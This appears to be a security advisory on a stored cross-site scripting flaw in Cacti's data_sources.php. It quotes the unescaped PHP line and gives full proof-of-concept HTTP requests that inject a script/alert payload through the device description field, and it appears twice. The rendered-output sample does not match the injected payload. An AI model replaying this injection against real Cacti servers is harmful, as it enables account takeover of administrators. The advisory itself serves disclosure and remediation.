Summary
A Stored Cross-Site-Scripting Vulnerability allows an authenticated user to poison data stored in the cacti's database. These data will be viewed by administrative cacti accounts and execute JavaScript code in the victim's browser at view-time.
Details
The script under data_sources.php
displays the data source management information (e.g. data source path, polling configuration, device name related to the datasource etc.) for different data visualizations of the cacti app. CENSUS found that an adversary that is able to configure a malicious device name, can deploy a stored XSS attack against any user of the same (or broader) privileges.
A user that possesses the General Administration>Sites/Devices/Data permissions can configure the device names in cacti. This configuration occurs through http://<HOST>/cacti/host.php
, while the rendered malicious payload is exhibited at http://<HOST>/cacti/data_sources.php
.
The relevant vulnerable code-block could be found at data_sources.php:866
<span class='linkMarker'>*</span><a class='hyperLink' href='<?php print html_escape('graphs.php?action=graph_edit&id=' . $id['local_graph_id']);?>'><?php print __('Edit Graph: \'%s\'.', $name);?></a>
Notice how the $name
variable is not escaped, enabling malicious code to be injected in the rendered page.
A Stored XSS attack, aka Stored Cross Site Scripting attack, is manifested when an adversary poisons data that is stored in the backend with malicious JavaScript code. If a site is vulnerable to a stored XSS attack then when the poisoned data get rendered on the victim's browser, the malicious code block will become part of the browser's DOM and with thus be executed at view-time.
PoC
To verify the issue one can perform a call of the following form, in order to place a malicious payload in the cacti database:
POST /cacti/host.php?header=false HTTP/1.1
Host: <HOST>
Content-Length: 739
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://{HOST}
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: <COOKIE>
Connection: close
__csrf_magic=<TOKEN>&description=%3Cscript%3Ealert('malicious+code+in+device+name')%3C%2Fscript%3E&hostname=localhost&location=&poller_id=1&site_id=1&host_template_id=1&device_threads=1&snmp_version=2&snmp_community=public&snmp_security_level=authPriv&snmp_auth_protocol=MD5&snmp_username=&snmp_password=&snmp_password_confirm=&snmp_priv_protocol=DES&snmp_priv_passphrase=&snmp_priv_passphrase_confirm=&snmp_context=&snmp_engine_id=&snmp_port=161&snmp_timeout=500&max_oids=10&bulk_walk_size=-1&availability_method=2&ping_method=1&ping_port=23&ping_timeout=400&ping_retries=1¬es=&external_id=&id=4&save_component_host=1&graph_template_id=26&snmp_query_id=5&reindex_method=1&action=save
For the attacker to place the malicious payload, the aforementioned General Administration>Sites/Devices/Data privileges are required. For the victim to view the malicious information, the same or higher privileges are required.
An example request that renders the malicious data can be found below:
GET /cacti/data_sources.php?action=ds_edit&id=39 HTTP/1.1
Host: <HOST>
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: <COOKIE>
Connection: close
Following the rendered payload in the response of the request above
<tr><td>Total: 0.000000, Delta: 0.000000, Could not find data query XML file at '<script>alert('malicious data query path')</script>'</td></tr>
Impact
To perform the Stored XSS attack the adversary needs to be an authorized cacti user with the following permissions:
- General Administration>Sites/Devices/Data in order to create a device or edit an existent device's name
The victim of this attack should have at least the following permissions
- General Administration>Sites/Devices/Data to view the
data_sources.php
Once the attacker has executed the malicious JavaScript within the victim's browser it is possible to
- perform a victim-account takeover
- perform arbitrary actions on the platform as the victim user
- redirect the user to a malicious website
- ask for sensitive information, under the cover of the cacti webpage
- run browser related exploits and attacks
- join a browser botnet and participate in a DDoS attack
Remediation
Before rendering this user supplied information either make this be a text element in the rendered HTML or escape (by using HTML entities) the content so that the malicious block will not be considered as code in the final HTML output.
The issue was identified by Vissarion Moutafis of CENSUS. CENSUS will be releasing an advisory for this issue once a release that fixes the issue becomes available (or in 90 days, whichever comes first). Should you require assistance with the review of the patch we will be more than happy to help!
Summary
A Stored Cross-Site-Scripting Vulnerability allows an authenticated user to poison data stored in the cacti's database. These data will be viewed by administrative cacti accounts and execute JavaScript code in the victim's browser at view-time.
Details
The script under
data_sources.php
displays the data source management information (e.g. data source path, polling configuration, device name related to the datasource etc.) for different data visualizations of the cacti app. CENSUS found that an adversary that is able to configure a malicious device name, can deploy a stored XSS attack against any user of the same (or broader) privileges.A user that possesses the General Administration>Sites/Devices/Data permissions can configure the device names in cacti. This configuration occurs through
http://<HOST>/cacti/host.php
, while the rendered malicious payload is exhibited athttp://<HOST>/cacti/data_sources.php
.The relevant vulnerable code-block could be found at
data_sources.php:866
Notice how the
$name
variable is not escaped, enabling malicious code to be injected in the rendered page.A Stored XSS attack, aka Stored Cross Site Scripting attack, is manifested when an adversary poisons data that is stored in the backend with malicious JavaScript code. If a site is vulnerable to a stored XSS attack then when the poisoned data get rendered on the victim's browser, the malicious code block will become part of the browser's DOM and with thus be executed at view-time.
PoC
To verify the issue one can perform a call of the following form, in order to place a malicious payload in the cacti database:
For the attacker to place the malicious payload, the aforementioned General Administration>Sites/Devices/Data privileges are required. For the victim to view the malicious information, the same or higher privileges are required.
An example request that renders the malicious data can be found below:
Following the rendered payload in the response of the request above
Impact
To perform the Stored XSS attack the adversary needs to be an authorized cacti user with the following permissions:
The victim of this attack should have at least the following permissions
data_sources.php
Once the attacker has executed the malicious JavaScript within the victim's browser it is possible to
Remediation
Before rendering this user supplied information either make this be a text element in the rendered HTML or escape (by using HTML entities) the content so that the malicious block will not be considered as code in the final HTML output.